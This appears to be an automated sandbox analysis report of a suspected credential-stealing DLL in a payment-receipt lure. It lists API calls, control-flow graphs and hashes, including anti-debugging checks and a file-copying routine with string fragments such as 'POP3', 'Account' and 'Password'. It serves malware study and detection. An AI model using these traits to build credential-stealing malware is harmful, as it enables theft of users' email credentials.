                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2099061454-0
                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                    • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                    • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                    Control-flow Graph

                                                    control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                    • String ID:
                                                    • API String ID: 2152742572-0
                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                    • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                    • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID: *O"/
                                                    • API String ID: 3906539128-463055101
                                                    • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                    • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                    • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                    • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *O"/$.
                                                    • API String ID: 0-368595237
                                                    • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                    • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                    • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                    • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                    • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                    • ExitProcess.KERNEL32 ref: 10004AEE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                    • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                    • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                    • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                    • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                    • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                    • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 153 10001982-10001985 150->153 154 1000184b-1000184e 150->154 151->146 156 10001995-10001999 153->156 157 10001987 153->157 154->153 158 10001854-10001881 call 100044b0 * 2 call 10001db7 154->158 156->150 156->151 160 1000198a-1000198d call 10002c40 157->160 170 10001887-1000189f call 100044b0 call 10001db7 158->170 171 1000193d-10001943 158->171 166 10001992 160->166 166->156 170->171 187 100018a5-100018a8 170->187 173 10001945-10001947 171->173 174 1000197e-10001980 171->174 173->174 175 10001949-1000194b 173->175 174->160 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->166 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->174 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->156 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->156
                                                    APIs
                                                      • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                      • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                      • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                    • _strlen.LIBCMT ref: 10001855
                                                    • _strlen.LIBCMT ref: 10001869
                                                    • _strlen.LIBCMT ref: 1000188B
                                                    • _strlen.LIBCMT ref: 100018AE
                                                    • _strlen.LIBCMT ref: 100018C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen$File$CopyCreateDelete
                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                    • API String ID: 3296212668-3023110444
                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                    • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                    • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                    • API String ID: 4218353326-230879103
                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 298 10007df0-10007dfc 293->298 299 10007dda-10007ddf 293->299 302 10007dd1 294->302 303 10007dbd-10007dc0 294->303 295->296 304 10007d1c-10007d2e call 1000571e call 100091b8 295->304 296->277 298->290 311 10007dfe-10007e0b call 1000571e 298->311 308 10007de1-10007de4 299->308 309 10007ded 299->309 302->293 303->302 313 10007dc2-10007dd0 call 1000571e * 2 303->313 304->296 308->309 316 10007de6-10007dec call 1000571e 308->316 309->298 313->302 316->309
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                    • _free.LIBCMT ref: 10007CFB
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 10007D1D
                                                    • _free.LIBCMT ref: 10007D32
                                                    • _free.LIBCMT ref: 10007D3D
                                                    • _free.LIBCMT ref: 10007D5F
                                                    • _free.LIBCMT ref: 10007D72
                                                    • _free.LIBCMT ref: 10007D80
                                                    • _free.LIBCMT ref: 10007D8B
                                                    • _free.LIBCMT ref: 10007DC3
                                                    • _free.LIBCMT ref: 10007DCA
                                                    • _free.LIBCMT ref: 10007DE7
                                                    • _free.LIBCMT ref: 10007DFF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                    • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                    • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                    • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

                                                    Control-flow Graph

                                                    APIs
                                                    • _free.LIBCMT ref: 100059EA
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100059F6
                                                    • _free.LIBCMT ref: 10005A01
                                                    • _free.LIBCMT ref: 10005A0C
                                                    • _free.LIBCMT ref: 10005A17
                                                    • _free.LIBCMT ref: 10005A22
                                                    • _free.LIBCMT ref: 10005A2D
                                                    • _free.LIBCMT ref: 10005A38
                                                    • _free.LIBCMT ref: 10005A43
                                                    • _free.LIBCMT ref: 10005A51
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                    • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                    • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                    • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 360 10009492-100094ef GetConsoleCP 361 10009632-10009644 call 10002ada 360->361 362 100094f5-10009511 360->362 364 10009513-1000952a 362->364 365 1000952c-1000953d call 10007c19 362->365 367 10009566-10009575 call 100079e6 364->367 372 10009563-10009565 365->372 373 1000953f-10009542 365->373 367->361 374 1000957b-1000959b WideCharToMultiByte 367->374 372->367 375 10009548-1000955a call 100079e6 373->375 376 10009609-10009628 373->376 374->361 377 100095a1-100095b7 WriteFile 374->377 375->361 382 10009560-10009561 375->382 376->361 379 100095b9-100095ca 377->379 380 1000962a-10009630 GetLastError 377->380 379->361 383 100095cc-100095d0 379->383 380->361 382->374 384 100095d2-100095f0 WriteFile 383->384 385 100095fe-10009601 383->385 384->380 386 100095f2-100095f6 384->386 385->362 387 10009607 385->387 386->361 388 100095f8-100095fb 386->388 387->361 388->385
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                    • __fassign.LIBCMT ref: 1000954F
                                                    • __fassign.LIBCMT ref: 1000956A
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                    • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                    • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID: *O"/
                                                    • API String ID: 1324828854-463055101
                                                    • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                    • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                    • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                    • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                                    Control-flow Graph

                                                    APIs
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 1454806937-0
                                                    • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                    • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                    • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                    • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 406 10008821-1000883a 407 10008850-10008855 406->407 408 1000883c-1000884c call 10009341 406->408 409 10008862-10008886 MultiByteToWideChar 407->409 410 10008857-1000885f 407->410 408->407 418 1000884e 408->418 412 10008a19-10008a2c call 10002ada 409->412 413 1000888c-10008898 409->413 410->409 415 1000889a-100088ab 413->415 416 100088ec 413->416 419 100088ca-100088db call 100056d0 415->419 420 100088ad-100088bc call 1000bf20 415->420 422 100088ee-100088f0 416->422 418->407 424 10008a0e 419->424 434 100088e1 419->434 420->424 433 100088c2-100088c8 420->433 423 100088f6-10008909 MultiByteToWideChar 422->423 422->424 423->424 427 1000890f-1000892a call 10005f19 423->427 428 10008a10-10008a17 call 10008801 424->428 427->424 438 10008930-10008937 427->438 428->412 437 100088e7-100088ea 433->437 434->437 437->422 439 10008971-1000897d 438->439 440 10008939-1000893e 438->440 442 100089c9 439->442 443 1000897f-10008990 439->443 440->428 441 10008944-10008946 440->441 441->424 444 1000894c-10008966 call 10005f19 441->444 445 100089cb-100089cd 442->445 446 10008992-100089a1 call 1000bf20 443->446 447 100089ab-100089bc call 100056d0 443->447 444->428 461 1000896c 444->461 450 10008a07-10008a0d call 10008801 445->450 451 100089cf-100089e8 call 10005f19 445->451 446->450 459 100089a3-100089a9 446->459 447->450 460 100089be 447->460 450->424 451->450 464 100089ea-100089f1 451->464 463 100089c4-100089c7 459->463 460->463 461->424 463->445 465 100089f3-100089f4 464->465 466 10008a2d-10008a33 464->466 467 100089f5-10008a05 WideCharToMultiByte 465->467 466->467 467->450 468 10008a35-10008a3c call 10008801 467->468 468->428
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                    • __freea.LIBCMT ref: 10008A08
                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                    • __freea.LIBCMT ref: 10008A11
                                                    • __freea.LIBCMT ref: 10008A36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID: *O"/
                                                    • API String ID: 1414292761-463055101
                                                    • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                    • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                    • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                    • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 471 10003370-100033b5 call 10003330 call 100037a7 476 10003416-10003419 471->476 477 100033b7-100033c9 471->477 478 10003439-10003442 476->478 479 1000341b-10003428 call 10003790 476->479 477->478 480 100033cb 477->480 483 1000342d-10003436 call 10003330 479->483 482 100033d0-100033e7 480->482 484 100033e9-100033f7 call 10003740 482->484 485 100033fd 482->485 483->478 493 100033f9 484->493 494 1000340d-10003414 484->494 486 10003400-10003405 485->486 486->482 489 10003407-10003409 486->489 489->478 492 1000340b 489->492 492->483 495 10003443-1000344c 493->495 496 100033fb 493->496 494->483 497 10003486-10003496 call 10003774 495->497 498 1000344e-10003455 495->498 496->486 504 10003498-100034a7 call 10003790 497->504 505 100034aa-100034c6 call 10003330 call 10003758 497->505 498->497 500 10003457-10003466 call 1000bbe0 498->500 506 10003483 500->506 507 10003468-10003480 500->507 504->505 506->497 507->506
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                    • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                    • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: *O"/$csm
                                                    • API String ID: 1170836740-2149301626
